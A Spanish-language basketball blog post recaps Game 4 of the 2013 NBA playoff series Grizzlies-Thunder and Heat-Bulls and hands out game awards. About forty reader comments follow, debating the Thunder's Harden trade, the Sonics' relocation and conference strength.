La Crónica: Visto para sentencia

14 de May de 2013 por Simon

Así parecen estar las dos series que disputaron ayer su cuarto partido. Tanto Miami como Memphis sumaron anoche su tercer punto en la eliminatoria y tendrán su primer match ball en el quinto aunque Memphis Grizzlies lo hará fuera de casa.

Los Grizzlies consiguieron de nuevo la victoria en su feudo para ponerse en una posición inmejorable y obtener lo que sería un nuevo hito para la franquicia: llegar a finales de conferencia. El partido comenzó muy de cara para Oklahoma que desde muy pronto se marchó en el marcador y llegó a obtener ventajas  en el primer cuarto que superaron los 10 puntos y que durante el segundo alcanzaron un máximo de 17 puntos. El partido estaba justo donde quería Oklahoma, con todos sus jugadores enchufados y Durant actuando de canalizador de juego con 14 puntos y 6 asistencias en este primer tiempo pero un par de canastas de Randolph seguidas de dos triples consecutivos de Bayless metieron de nuevo a los Grizzlies en el partido antes del descanso.  En el segundo tiempo el partido fue totalmente diferente. Memphis comenzó a ser capaz de imponer su defensa y los Thunder sufrían para anotar. No obstante, a pesar de las sensaciones tan distintas que transmitían un equipo y otro, el partido fue igualado en toda su segunda parte. Los últimos minutos tuvieron constantes alternancias en el marcador. A falta de 10 segundos, Marc Gasol sólo fue capaz de anotar uno de los dos tiros libres de los que disponía para colocar a Memphis dos arriba. A continuación Durant anotó una bandeja para igualar el partido y Perkins se ganó el jornal al taponar el tiro sobre la bocina de Zach Randolph. En la prórroga Memphis fue muy superior. Las mejores sensaciones que transmitían en la segunda parte y que no se refrendaban en el marcador si se reflejaron en la prórroga. Un Durant bien defendido  por Prince y claramente afectado por el cansancio se quedó sin anotar y Oklahoma sólo anoto un triple de Fisher. Con ventaja para los locales por un sólo punto, una canasta de Marc Gasol seguida de un robo de Allen sentenciaron el partido para los de Lionel Hollins, que ponen el 3-1 en el marcador y están a un paso de eliminar al gran favorito del Oeste (97-103). El mejor fue Marc Gasol que dominó el partido en ambos lados de la cancha con 23 puntos, 11 rebotes y 6 tapones acompañado por su compañero de faenas en la pintura Z-Bo con otros 23 puntos adornados con 12 rebotes y 3 asistencias.  En Oklahoma esta vez Durant no estuvo tan sólo (4 de sus compañeros consiguieron  mas de 10 puntos) pero fue el propio Durant el que no estuvo muy acertado. Terminó el partido con 27 puntos, 7 rebotes y 7 asistencias pero con porcentajes de tiro bajos. Muy mal pinta esta serie para Oklahoma, a la desventaja que presenta el marcador hay que sumarle que su estrella está exhausta y sus compañeros no están para asumir responsabilidades. 

Los actuales campeones sentenciaron su serie venciendo por tercer partido consecutivo a Chicago Bulls. Apuesten a que el próximo partido de esta serie será el definitivo. El partido fue de nuevo muy físico con las defensas imponiéndose al ataque. Desde el inicio Miami consiguió una ventaja que le serviría para llevar el partido cómodo y no verse comprometido durante ningún momento del transcurso del mismo, aunque fue en el tercer cuarto donde Miami Heat abrió  la brecha definitiva tras quedarse los Bulls en unos míseros 9 puntos que suponen la peor anotación de la franquicia  en un cuarto de Play Off.  En el último cuarto intrascendente, con el partido sentenciado, ambos equipos rebajaron su intensidad defensiva y fueron capaces de anotar con más facilidad (88-65). Chicago tuvo un partido para olvidar,  su dominio sobre el rebote no sirvió de nada debido a su paupérrimo acierto en el tiro, 25’7% de acierto para el equipo en tiros de campo, con jugadores como Nate Robinson (0/12), Boozer (3/14) o Noah (1/6) a la cabeza. Los 65 puntos anotados suponen la peor puntuaciónd el a historia de la franquicia en un partido de post-temporada.  En Miami, Lebron mantuvo su nivel habitual, 27 puntos, 7 rebotes y 8 asistencias aunque el resto del equipo, salvo Bosh, no estuvo demasiado acertado. Wade se resintió de sus problemas de rodilla. Aunque Miami vaya a llevarse la serie con relativa facilidad, seguro que Heat saldrá muy cansado de esta serie tanto física como psicológicamente. Además Chicago está demostrando que no son invencibles y están siendo capaces de frenarlos en defensa durante muchos minutos lo que da que pensar que un equipo más capaz ofensivamente que Chicago puede complicar mucho la vida a Lebron y sus muchachos.

PREMIOS

MVP: Lebron James dominó como quiso a unos exhaustos Bulls. Les endosó 27 puntos, 7 rebotes, 8 asistencias y 2 robos sin exprimirse demasiado. El que sí tuvo que pelear hasta el final fue Marc Gasol. Sus 23 puntos, 11 rebotes y 6 tapones fueron vitales en la victoria de los Grizzlies.

Sorpresa: Ponga un Chris Andersen en su equipo. En 14 minutos, 9 puntos, 4 rebotes, 2 tapones y una intensidad propia de su rival de anoche. Miedo da pensar en “Birdman” con la camiseta de Chicago.

Decepción: No hay nada que reprochar a Nate Robinson después de la temporada que se ha marcado pero su partido de ayer demuestra que el milagro de los Bulls llega a su fin. 0 de 12 en tiros de campo y 0 puntos en su marcador final.

Esfuerzo en vano: No fue el mejor partido de Kevin Durant pero aún así acabó con 27 puntos (10 de 27 en tiro), 7 rebotes y 7 asistencias. Serge Ibaka apareció por fin con 17 puntos y 14 rebotes.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

41 comentarios a esta entrada

  1. Denise dice:
    #1

    ¿Por qué Ed Davis no entra en la rotación de Memphis? A mi me parece un muy buen jugador…

      Citar

  2. pcerezo dice:
    #2

    Ahora viendo a OKC es cuando el colega que le dio la pasta a Ibaka y no a Harden es despedido. Cagada histórica.

      Citar

  3. Nacho dice:
    #3

    pcerezo:
    Ahora viendo a OKC es cuando el colega que le dio la pasta a Ibaka y no a Harden es despedido. Cagada histórica.

    Mi no entender!!! ¿El colega que le dio la pasta a Ibaka pensaba en la lesión de Westbrook? ¿Para que quería OKC el trío lalala adornado con un Perkins y un Bonner/Hill de la vida? El movimiento me sigue pareciendo bueno. ¿O Hardem iba a hacer el temporadón que ha hecho estando en OKC?
    No sé, me parece un comentario oportunista, y que no tiene en cuenta variables no ponderables en su momento.

      Citar

  4. JhC dice:
    #4

    Nacho: Mi no entender!!! ¿El colega que le dio la pasta a Ibaka pensaba en la lesión de Westbrook? ¿Para que quería OKC el trío lalala adornado con un Perkins y un Bonner/Hill de la vida? El movimiento me sigue pareciendo bueno. ¿O Hardem iba a hacer el temporadón que ha hecho estando en OKC?
    No sé, me parece un comentario oportunista, y que no tiene en cuenta variables no ponderables en su momento.

    +1

      Citar

  5. HisRoyalAirness dice:
    #5

    Yo estoy con pcerezo, el movimiento es una mierda. Tienes un Big Three fruto del draft, que además son buenos amigos y prefieres quedarte con un tipo que el único talento real que tiene es el de taponar? Y este partido muy bien pero lleva todos los PO dando penita. Ya has perdido unas finales con los 4 juntos y el imprescindible es Ibaka?

    Lo de Memphis es un escándalo, qué bien juegan a esto

      Citar

  6. Nacho dice:
    #6

    Yo no digo que Ibaka sea imprescindible. Dime que juego interior te queda, sin pasta al renovar a Hardem, y si con estos tres puedes ganar unas finales. Que parece que nos olvidamos del tope salarial, de que los jugadores quieren asumir (generalmente) más rol y más dinero, y de que OKC no es LA ni NY.

      Citar

  7. Simon dice:
    #7

    Estoy de acuerdo, ese comentario es ventajista por decirlo ahora, pero bien es cierto que en su momento, muchos ( entre los que me incluyo ) ya dijimos que nos parecía un error que el traspasado fuera Harden. En mi caso en concreto yo pedía el traspaso para Westbrook, aunque no entro en profundidad en los motivos, pienso que Westbrook es un jugadorazo, de los 5 mejores en su posición pero… no se, Ibaka era inamovible porque si no, la pintura se quedaba desolada y a Harden es que se le veía una aura de jugador especial de los de verdad y un base hoy en día un sustituto de Westbrook más fácil de pescar que un Harden y para muestras lo “bien” que lo está haciendo Jackson ( a años luz pero al fin y al cabo más me valdría este equipo con Harden y Jackson y no Westbrook y Martin por ejemplo.

      Citar

  8. Simon dice:
    #8

    Al fin y al cabo lo que quiero decir es que Oklahoma tenía todos los mimbres para dominar la próxima decada ( por encima de Miami incluso ) pero ahora es que no los veo siendo una dinastía ( es más, a pesar de Durant diría que veo como a 2 o 3 equipos con mejores posibilidades que ellos para los próximos 3 o 4 años ) pues cuando Perkins terminé contrato liberará un salario que Oklahoma no va a poder invertir en su totalidad en otro jugador pues seguirán rozando el limite… muy hábil tiene que estar su GM para reconducir esta plantilla creo yo.

      Citar

  9. Nacho dice:
    #9

    En eso estoy de acuerdo Simon. Tal vez movido por mi desagrado hacia Westbrook, al que como tú considero un jugadorazo.

      Citar

  10. Nacho dice:
    #10

    Y lo de Menphis es una pasada. Creo que se ha dicho aquí… Pero pueden ser este año los Pistons bicampeones. ¿Les falta, quizás, la confianza de los Wallace? Veremos

      Citar

  11. rumbero dice:
    #11

    Nacho:
    Yo no digo que Ibaka sea imprescindible. Dime que juego interior te queda, sin pasta al renovar a Hardem, y si con estos tres puedes ganar unas finales. Que parece que nos olvidamos del tope salarial, de que los jugadores quieren asumir (generalmente) más rol y más dinero, y de que OKC no es LA ni NY.

    Eso está claro. El problema es que Ibaka y Perkins tampoco parece que les vayan a sacar de pobres y se van a ir a los 20 kilos entre los dos la temporada que viene. Sacando egos y protagonismo de la ecuación, con el trio maravilla y un par de veteranos a lo Andersen igual les iría mucho mejor, pero a toro pasado somos unos lumbreras y yo el que más 😀 Pero a Harden no te lo podías quitar de encima
    Todo esto que no le quite nada de mérito a como estan jugando estos Grizzlies. Si que tienen un aire a esos Pistons, con un quinteto de la leche y teniendo muy claro que hay que hacer, mérito también de Hollins. Un escándalo lo de Marc.

    Los Bulls creo que no llegan al quinto. Madre mia estan fundidos no lo siguiente. Y con el tema de la alta médica y los 100 posibles retornos de Rose flotando en el ambiente de Chicago…

      Citar

  12. HisRoyalAirness dice:
    #12

    Simon:
    Estoy de acuerdo, ese comentario es ventajista por decirlo ahora, pero bien es cierto que en su momento, muchos ( entre los que me incluyo ) ya dijimos que nos parecía un error que el traspasado fuera Harden. En mi caso en concreto yo pedía el traspaso para Westbrook, aunque no entro en profundidad en los motivos, pienso que Westbrook es un jugadorazo, de los 5 mejores en su posición pero… no se, Ibaka era inamovible porque si no, la pintura se quedaba desolada y a Harden es que se le veía una aura de jugador especial de los de verdad y un base hoy en día un sustituto de Westbrookmás fácil de pescar que un Harden y para muestras lo “bien” que lo está haciendo Jackson ( a años luz pero al fin y al cabomás me valdría este equipo con Harden y Jackson y no Westbrook y Martin por ejemplo.

    Vamos a ver, la pintura de OKC ya está desolada. Un equipo como Miami sin juego interior? Te hacen un traje. Un equipo como Memphis con un juego interior poderoso? Te hacen un traje.
    Ibaka lo único que hace es negar 3 canastas por partido, eso no es ser buen defensor. Es más, es bastante burro, cualquier jugadore listo sabe que siempre va a saltar al tapón y no hay más que acercarse a él en la pintura, fintar, y dársela al pivot. O eso o tirar como sea, porque como no va a cerrar el rebote sino que habrá ido a intentar poner la chapa, siempre tendrás un 2 contra 1 de grandes debajo del aro (así es como está consiguiendo MEM la mayoría de sus rebotes ofensivos).

    Si asumimos que un mercado pequeño no puede ganar un campeonato pues que traspasen a Durant y Westbrook pero supongo que sí que quieren. Y si es tu deseo tienes que saber que tendrás que poner pasta durante 3 años para ser un contender, o hacer algo más razonable y ofrecer a Harden e Ibaka por Howard, Brook López o algo similar. Los 20-30 kilos de impuesto de lujo si llegas a las finales son más que asumibles (sea por taquilla añadida o por publicidad).
    Tener una plantilla con Durant-Harden-Westbrook y perder las finales, echar a uno y pensar que vas a llegar más lejos con Kevin Martin es absolutamente demencial, lesión de RW al margen

      Citar

  13. Simon dice:
    #13

    Si en eso estoy de acuerdo HisRoyal, yo de primeras creo que no tendrian que haber traspasado a ninguno y haber apostado de verdad por el campeonato, mi comentario va siempre en el sentido de pensando como pensaba el GM de OKC en que Ibaka para la pintura era inamovible y que uno de los del backcourt sobraba…
    Yo soy de los que no entiendo como coño Ibaka pudo ser DPY o estar año si año tambien en el quinteto de mejores defensores… pero antes intentaba dar la visión un poco pensando como pensaba el GM que uno de los exteriores tenia que ser el damnificado.

      Citar

  14. Simon dice:
    #14

    Y ahora abro otro debate, de verdad que a la larga va a ser provechoso que los Sonics se mudaran a OKC??? Hasta ahora con el buen equipo que había se nos ha escapado el hecho de que es un mercado pequeño… dan la sensacion que una vez Durant vuele, el equipo pasará a ser de los mediocres…
    y ahora los dueños se empeñan en negar el traslado de los Kings ( mercado pequeño ) a uno grande como Seattle… en fiin…

      Citar

  15. HisRoyalAirness dice:
    #15

    Simon, Ibaka no ha sido DPY

      Citar

  16. Denise dice:
    #16

    Simon: Y ahora abro otro debate, de verdad que a la larga va a ser provechoso que los Sonics se mudaran a OKC??? Hasta ahora con el buen equipo que había se nos ha escapado el hecho de que es un mercado pequeño… dan la sensacion que una vez Durant vuele, el equipo pasará a ser de los mediocres…y ahora los dueños se empeñan en negar el traslado de los Kings ( mercado pequeño ) a uno grande como Seattle… en fiin…

    Si no me equivoco, se decidieron ir a Oklahoma porque cuando pasó lo del huracan Katrina, los Hornets tuvieron que jugar muchos partidos en Oklahoma, y la gente allí los recibieron con los brazos abiertos, por lo que lo vieron como una buena oportunidad de negocio el establecer la franquicia allí.

    Mas allá de lo grande que sea la ciudad, todo depende de la ambición del propietario y si se hacen bien las cosas en los despachos.

      Citar

  17. GreenPride dice:
    #17

    Bueno, pues día de eliminatorias confirmadas.
    En Memphis los Grizzlies dieron el golpe casi definitivo encima de la mesa con una gran defensa en la segunda parte que bloqueó a Durant y con ello a todo el equipo de Oklahoma. Durant llega muerto al final de los partidos y eso se nota, además al final le defienden dos o tres jugadores y no puede doblar la bola porque el resto no se atreve a tirar (honrosas excepción a esto es Fisher). Llegados a este punto y con Marc&Zach comiendose a la pareja ¿defensiva? Ibaka&Perk las series parecen listas para que Memphis las acabe por la vía rápida o como mucho en el 6º en casa. Con la intensidad que juegan es una lástima que los Grizzlies no tengan un poco más de talento exterior porque serían favoritos en el Oeste.
    En cuanto a lo que comentáis de Ibaka y Harden yo creo que el problema es anterior. ¿De verdad no os habéis planteado que el que sobra ahí es Perkins? Ahora mismo OKC debería tener en nómina el siguiente quinteto: Westbrook, Harden, Jerff Green, Durant e Ibaka. Sí a final de temporada tendrían que deshacerse de uno de ellos (Green o Ibaka seguramente) pero su pérdida no sería tan traumática ya que quedarían todos los demás. Yo creo que la gran cagada fue el traspaso de Green por Perkins.
    En el Este poco que decir. Miami con un LeBron al 70% de lo que puede hacer y Wade en estado lamentable ganó fácilmente a unos Bulls muertos físicamente que en cuanto han visto la superioridad de los Heat se han venido abajo, lógico por otra parte y motivo de gran aplauso su temporada que casi con total seguridad acabará en el 5º partido de estas series. Por los Heat si bien aún no se han enfrentado a un rival de su altura tienen motivos para el optimismo y también para la preocupación. Bosh parece haber despertado y su defensa raya a muy buena altura (ante dos equipos muy malos en ataque todo hay que decirlo) , LeBron sigue a lo suyo aunque no especialmente acertado y en general parecen muy superiores. Sin embargo hay momentos donde la falta de Wade que está físicamente fatal les hace sufrir ciertos atascos y dar la impresión de que son más vencibles de lo que podía pensarse antes de los PO. Lástima que en el Este no haya ningún contender de verdad para verles antes de las finales porque no tengo mucha confianza en que Pacers o Knicks puedan hacer en las finales de conferencia.

      Citar

  18. Laker1624 dice:
    #18

    Buenas

    Ahora mismo creo que el equipo que pondría en mas apuros a Miami serían los Grizzlies. No creo que los Spurs puedan llegar a las finales en el estado físico idóneo para disputarle el campeonato a los Heat. Aunque una hipotética eliminatoria Grizzlies-Spurs la veo muy igualada. A estas alturas creo que no es ninguna locura considerar a los Grizzlies como un serio aspirante a alzarse con el titulo. Aunque tengo claro que el favorito con diferencia son los Heat.

      Citar

  19. HisRoyalAirness dice:
    #19

    GreenPride:
    Bueno, pues día de eliminatorias confirmadas.
    En Memphis los Grizzlies dieron el golpe casi definitivo encima de la mesa con una gran defensa en la segunda parte que bloqueó a Durant y con ello a todo el equipo de Oklahoma. Durant llega muerto al final de los partidos y eso se nota, además al final le defienden dos o tres jugadores y no puede doblar la bola porque el resto no se atreve a tirar (honrosas excepción a esto es Fisher). Llegados a este punto y con Marc&Zach comiendose a la pareja ¿defensiva? Ibaka&Perk las series parecen listas para que Memphis las acabe por la vía rápida o como mucho en el 6º en casa. Con la intensidad que juegan es una lástima que los Grizzlies no tengan un poco más de talento exterior porque serían favoritos en el Oeste.
    En cuanto a lo que comentáis de Ibaka y Harden yo creo que el problema es anterior. ¿De verdad no os habéis planteado que el que sobra ahí es Perkins? Ahora mismo OKC debería tener en nómina el siguiente quinteto: Westbrook, Harden, Jerff Green, Durant e Ibaka. Sí a final de temporada tendrían que deshacerse de uno de ellos (Green o Ibaka seguramente) pero su pérdida no sería tan traumática ya que quedarían todos los demás. Yo creo que la gran cagada fue el traspaso de Green por Perkins.
    En el Este poco que decir. Miami con un LeBron al 70% de lo que puede hacer y Wade en estado lamentable ganó fácilmente a unos Bulls muertos físicamente que en cuanto han visto la superioridad de los Heat se han venido abajo, lógico por otra parte y motivo de gran aplauso su temporada que casi con total seguridad acabará en el 5º partido de estas series. Por los Heat si bien aún no se han enfrentado a un rival de su altura tienen motivos para el optimismo y también para la preocupación. Bosh parece haber despertado y su defensa raya a muy buena altura (ante dos equipos muy malos en ataque todo hay que decirlo) , LeBron sigue a lo suyo aunque no especialmente acertado y en general parecen muy superiores. Sin embargo hay momentos donde la falta de Wade que está físicamente fatal les hace sufrir ciertos atascos y dar la impresión de que son más vencibles de lo que podía pensarse antes de los PO. Lástima que en el Este no haya ningún contender de verdad para verles antes de las finales porque no tengo mucha confianza en que Pacers o Knicks puedan hacer en las finales de conferencia.

    POR SUPUESTO que Perkins sobra, eso ya ni lo discuto, pero a ver cómo te sacas de encima a semejante inútil con ese contrato.

    Green, con ese quinteto que dices (Westbrook-Harden-Green-Durant-Ibaka) la sangría de Marc y Z-Bo sería igual o peor. Siempre que Gasol se queda emparejado con Durant hay consigna de meterle el balón en el poste como sea y lo destroza; lo mismo con Randolph.
    Ya intentaron los Clippers jugarle “small-ball” a los ositos y les dieron una buena a la larga.

      Citar

  20. rumbero dice:
    #20

    Denise: Si no me equivoco, se decidieron ir a Oklahoma porque cuando pasó lo del huracan Katrina, los Hornets tuvieron que jugar muchos partidos en Oklahoma, y la gente allí los recibieron con los brazos abiertos, por lo que lo vieron como una buena oportunidad de negocio el establecer la franquicia allí.

    Mas allá de lo grande que sea la ciudad, todo depende de la ambición del propietario y si se hacen bien las cosas en los despachos.

    Es algo bastante más complejo que eso. Resumiendo y aunque se me vea el plumero: Schultz que era el propietario de los Sonics en su momento (y el jefazo de Starbucks) estaba un poco cansado ya de su juguetito y se lo vendió al amigo Clay Bennet que..(oh sorpresa) es de Oklahoma. Este mareó la perdiz con la remodelación del Key Arena para que fuera a cargo de las autoridades de Seattle y estos no estaban por la labor, pero su intención desde el primer momento era llevarse la franquicia a Oklahoma, independietemente del mercado que pudiera tener. Luego como dices, Stern que quedó muy contento de la acogida que tuvieron los Hornets cuando lo del Katrina fue un gran aliado y en Oklahoma si pusieron pasta para remodelar el Ford Center y la verdad es que los aficionados respondieron más que bien. El resto e historia, Ahora como bien decís habrá que ver cuando se les acabe el chollo de haber crecido con un equipazo a base de draft las ganas que tienen de dejarse los dineros

      Citar

  21. MagicJohnson32 dice:
    #21

    rumbero: Es algo bastante más complejo que eso. Resumiendo y aunque se me vea el plumero: Schultz que era el propietario de los Sonics en su momento (y el jefazo de Starbucks) estaba un poco cansado ya de su juguetito y se lo vendió al amigo Clay Bennet que..(oh sorpresa) es de Oklahoma. Este mareó la perdiz con la remodelación del Key Arena para que fuera a cargo de las autoridades de Seattle y estos no estaban por la labor, pero su intención desde el primer momento era llevarse la franquicia a Oklahoma, independietemente del mercado que pudiera tener. Luego como dices, Stern que quedó muy contento de la acogida que tuvieron los Hornets cuando lo del Katrina fue un gran aliado y en Oklahoma si pusieron pasta para remodelar el Ford Center y la verdad es que los aficionados respondieron más que bien. El resto e historia, Ahora como bien decís habrá que ver cuando se les acabe el chollo de haber crecido con un equipazo a base de draft las ganas que tienen de dejarse los dineros

    Correcto. A quien quiera saber más del tema le recomiendo el documental “Sonicsgate: Requiem For A Team”, que se puede ver en la web oficial: http://sonicsgate.com/

      Citar

  22. nba dice:
    #22

    Ni Phil Jackson hubiese salvado a a OKC de la derrota, normal que ante un equipo limitado ofensivamente pero muy trabajado como Memphis, los Thunder esten camino de quedar eliminados, ningun equipo se puede recuperar si tu segundo jugador franquicia se pierde la eliminatoria por lesion

      Citar

  23. Jose Luis dice:
    #23

    nba:
    Ni Phil Jackson hubiese salvado a a OKC de la derrota, normal que ante un equipo limitado ofensivamente pero muy trabajado como Memphis, los Thunder esten camino de quedar eliminados, ningun equipo se puede recuperar si tu segundo jugador franquicia se pierde la eliminatoria por lesion

    Rose se perdió por lesión la 1a ronda y los bulls pasaron

      Citar

  24. nba dice:
    #24

    Hablaba del “salvaje” Oeste Jose Luis

      Citar

  25. Esteban dice:
    #25

    el contrato de ibaka no era el problema, el problema era perkins a quien debieron haberle aplicado la amnistia hace siglos

    y mucha culpa tiene scott brooks, que ha jugado para durant y westbrook todo el año, no dandole oportunidades a jackson y ahora le suplica q sea westbrook y no haciendo entrar ni un minuto en la rotación a jeremy lamb (razon principal por la que dejaron ir a harden)

    asi dificil

      Citar

  26. Esteban dice:
    #26

    si el thunder hubiese amnistiado a perkins y ponia cualqwuier cacho de carne en su lugar, pdorian haber mantenido a harden y pagar algo, apenas el impuesto de lujo

    este año, nisiquiera tendrian q haberlo pagado

    presti ha hecho cosas realmente buenas en ese equipo, pero se le ha ido la mano cuando quiso hacerse el duro y mover a harden por no gustarle “su actitud” de estrella, PERO TIO, EL CHAVAL ES UNA ESTRELLA O NO LO VES?

    martin ha sido un fracaso, y dudo que acepte la exepcion de 5 millones y mas que eso dudo q le pagen en oklahoma y si en varios otros destinos, los propios rockets por ejemplo

    jeremy lamb no ha jugado ni 100 minutos en la liga, y el proximo año deberia ser el sexto hombre del equipo, como puede hacerlo si no le dan ni participacion?

    perkins se cobrara unos 8 millones la proxima temporada, cuano podian tener a turiaf, hollins, collins, etc haciendo lo mismo que hace perkins por el minimo salarial, ni hablar de kenyon martin y cris andersen

    en fin, como ainge o dumars parecieron dioses en su momento, y luego parecen simples mortales, presti esta en la misma

      Citar

  27. Lucho dice:
    #27

    Me estoy acordando de que en el momento del trade Calderon-Gay-Prince, el discurso mayoritario fue: “que lastima los Grizz, por estar obsesionados con el tope salarial, renuncian a pelear por el anillo y desarman todo. Ya paso con OJ Mayo y ahora con Gay. Una lastima. No hay quien meta puntos desde fuera”
    Las declaraciones de los directivos de los Grizz, en cambio, fueron las opuestas: “no estamos renunciando al campeonato. Al contrario, hicimos este cambio para tener mas chances, buscamos tener un mejor equipo. Ese fue nuestro objetivo”. Creo que la llegada del experto en estadisticas, exESPN, John Hollinger fue crucial. Fue el (en este blog siempre se dijo tambien) quien no consideraba a Gay jugador franquicia ni un jugador indispensable y se animo a cambiarlo. De hecho, basandonos en la clasificacion del PER, era un jugador sumamente sobrevalorado, que no justificaba su salario

      Citar

  28. safd dice:
    #28

    El tema Harden es ya un poco pesado… el no se fue por el dinero, OKC solo le ofrecio 500K menos, se fue porque queria ser una ESTRELLA, y siendo la 3ª opcion donde la 1ª y la 2ª tb son jugadores exteriores como tu, nunca te vas a convertir en esa superestrella en la q es ahora, es muyyy joven y ya tendra tiempo de volver a luchar por el anillo…

    Y el trade se analizara despues de que OKC haga todo el draft o los movimientos q vayan a hacer, pq fue un trade pensando a largo plazo, no a corto…

    El caso esq, con Westbrook posiblemente y el trade de Harden, los Thunder podrian estar en finales de conferencia o de la NBA perfectamente….

      Citar

  29. Jose Luis dice:
    #29

    nba:
    Hablaba del “salvaje” Oeste Jose Luis

    Explicación aceptada 🙂

      Citar

  30. MagicJohnson32 dice:
    #30

    Vamos a ver. Yo soy un gran fan de Harden, nunca me ha gustado Kevin Martin y detesto a Perkins, pero… Qué pronto se nos olvida que los Thunder han sido primeros del Oeste, que han ganado 13 partidos más que la temporada pasada con Harden (¡¡13!!) y que hace dos semanas era el gran favorito para enfrentarse a los Heat en las Finales.

      Citar

  31. HisRoyalAirness dice:
    #31

    Esteban, OKC no quiere/puede amnistiar, precisamente porque eso sería como pagar impuesto de lujo. Echar a Perkins para tener que pagarle 7 millones al año de todas maneras no tiene mucho sentido.

    Y lo de pensar que Presti hizo el trade pensando “a la larga” pues en fin, es proyecto de presente, ya llegaron a las Finales y es absurdo cambiarlo tod por futuras ¿futuras rondas? no me hagais reir

      Citar

  32. HisRoyalAirness dice:
    #32

    MagicJohnson32:
    Vamos a ver. Yo soy un gran fan de Harden, nunca me ha gustado Kevin Martin y detesto a Perkins, pero… Qué pronto se nos olvida que los Thunder han sido primeros del Oeste, que han ganado 13 partidos más que la temporada pasada con Harden (¡¡13!!) y que hace dos semanas era el gran favorito para enfrentarse a los Heat en las Finales.

    Magic para mí no lo eran (en serio, no es ventajismo, hay comentarios míos por ahí) pero aún así, si el año pasado palmaron con Harden, qué iban a hacer este año con Martin?

    Al final me toca mucho la moral el este, que sea un paseo militar hasta las finales y lleguen bien descansaditos. El año pasado OKC hizo unos playoffs increíbles, deshaciéndose de varios equipazos

      Citar

  33. Simon dice:
    #33

    MagicJohnson32:
    Vamos a ver. Yo soy un gran fan de Harden, nunca me ha gustado Kevin Martin y detesto a Perkins, pero… Qué pronto se nos olvida que los Thunder han sido primeros del Oeste, que han ganado 13 partidos más que la temporada pasada con Harden (¡¡13!!) y que hace dos semanas era el gran favorito para enfrentarse a los Heat en las Finales.

    Hombre Magic dime que prácticamente tuvieron el mismo porcentaje de victorias, pero no me digas que este año han ganado 13 partidos más porque siendo verdad no puede ser más falso ese dato, el año pasado con el lockout todos sabemos que se jugaron menos partidos. El porcentaje de este año es muy muy poquito mejor y eso es un gran merito pero es que dicho asi como tu lo dices parece que hayan dado un salto de calidad enorme a pesar de deshacerse de Harden… Además este año el Oeste me parece más flojo que el año pasado en terminos de los equipos de media tabla que han bajado muchas banderas.

      Citar

  34. MagicJohnson32 dice:
    #34

    Simon: Hombre Magic dime que prácticamente tuvieron el mismo porcentaje de victorias, pero no me digas que este año han ganado 13 partidos más porque siendo verdad no puede ser más falso ese dato, el año pasado con el lockout todos sabemos que se jugaron menos partidos. El porcentaje de este año es muy muy poquito mejor y eso es un gran merito pero es que dicho asi como tu lo dices parece que hayan dado un salto de calidad enorme a pesar de deshacerse de Harden… Además este año el Oeste me parece más flojo que el año pasado en terminos de los equipos de media tabla que han bajado muchas banderas.

    Ah, no, yo no hablo de salto de calidad. Digo que se han mantenido como el mejor equipo del Oeste y que ahora que Westbrook se lesiona (recuerdo: primera lesión de su carrera, este tío no se había perdido ni un partido jamás) volvemos con lo de Harden. Que sí, que a todos nos gustaban más los Thunder con Harden, pero la realidad es que sin él han sido primeros en el Oeste por primera vez desde los Sonics de Payton & Kemp.

    Por cierto ¿el Oeste más flojo?

      Citar

  35. Sempren dice:
    #35

    Hombre, al final estuvieron luchando por entrar en PO los peores Mavs de Dirk, Kobe Bryant & Friends (o debería decir Enemies), unos Jazz que patinaron todo lo que quisieron… para mí no fueron dignos candidatos a PlayOffs.
    Eso sí, del 7º para arriba fue el Wild West de siempre, desde los correosos Rockets, ya vemos donde están los Warriors, etc.

      Citar

  36. Simon dice:
    #36

    MagicJohnson32:

    Por cierto ¿el Oeste más flojo?

    Creo que eso ha sido más que evidente esta temporada. El Este sigue a un mundo e incluso los 5/6 primeros equipos de la conferencia mantienen el nivel, yo me refiero a los equipos del 8 al 10 de la conferencia que ahora me parecen peores que antes.

      Citar

  37. melo15 dice:
    #37

    Bueno eso de que las eliminatorias del Este han sido un paseo…

      Citar

  38. Denise dice:
    #38

    Simon: el Oeste me parece más flojo que el año pasado en terminos de los equipos de media tabla que han bajado muchas banderas.

    Totalmente en desacuerdo.
    En mi opinión, Mavericks, Jazz, Timberwolves (con Kevin Love) e incluso Portland ó Hornets se habrían clasificado comodamente para playoffs si jugasen en el Este.
    En cambio, solo Miami y NY se habrían clasificado para playoffs si jugasen en el Oeste.
    Por ejemplo, creo que si los Pacers (finalistas del Este probablemente) jugasen ahora una serie contra los Mavs (10º del Oeste), la eliminatoria estaría al 50%.

      Citar

  39. Simon dice:
    #39

    Denise yo me refiero en comparación a hace dos años en el propio Oeste no respecto al Este.
    Por cierto infravaloras mucho a Pacers…
    Si te das cuenta Jazz ha bajado el nivel respecto a otros años, Mavs no ha tenido a Nowitzki al 100% hasta el final, de los Wolves todo sabemos como han jugado esta temporada y los Blazers son lo que son, tampoco nos flipemos con nombres… Quizás con esos 4 equipos sin contratiempos si que el nivel habria sido equiparable a otros años pero esta temporada en concreto no… ( siempre hablo en comparacion al oeste en otras temporadas por si no se entiende bien )

      Citar

  40. MagicJohnson32 dice:
    #40

    No estoy de acuerdo. No podéis utilizar a los Lakers como argumento para defender que el Oeste ha bajado de nivel, sino más bien todo lo contrario. Si hubiese bajado, no habrían sufrido tanto. El ascenso de equipos como Denver y GSW (además de Memphis y Clippers haciendo las mejores temporadas de su historia) hace el Oeste más competitivo que nunca.

      Citar

  41. Albertis dice:
    #41

    HisRoyalAirness: Magic para mí no lo eran (en serio, no es ventajismo, hay comentarios míos por ahí) pero aún así, si el año pasado palmaron con Harden, qué iban a hacer este año con Martin?

    Al final me toca mucho la moral el este, que sea un paseo militar hasta las finales y lleguen bien descansaditos. El año pasado OKC hizo unos playoffs increíbles, deshaciéndose de varios equipazos

    Aún considerando que el Oeste es mucho mas potente y que estaría de acuerdo con que la manera de cruzarse en playoffs fuera con los 16 mejores equipos de la liga y las eliminatorias sin discriminación Este/Oeste creo que el camino de los Heat el año pasado a las finales no fue ningún camino de rosas, aceptando que los Thunder hicieron unos grandes playoffs.
    Un saludo!

      Citar

Deja un comentario

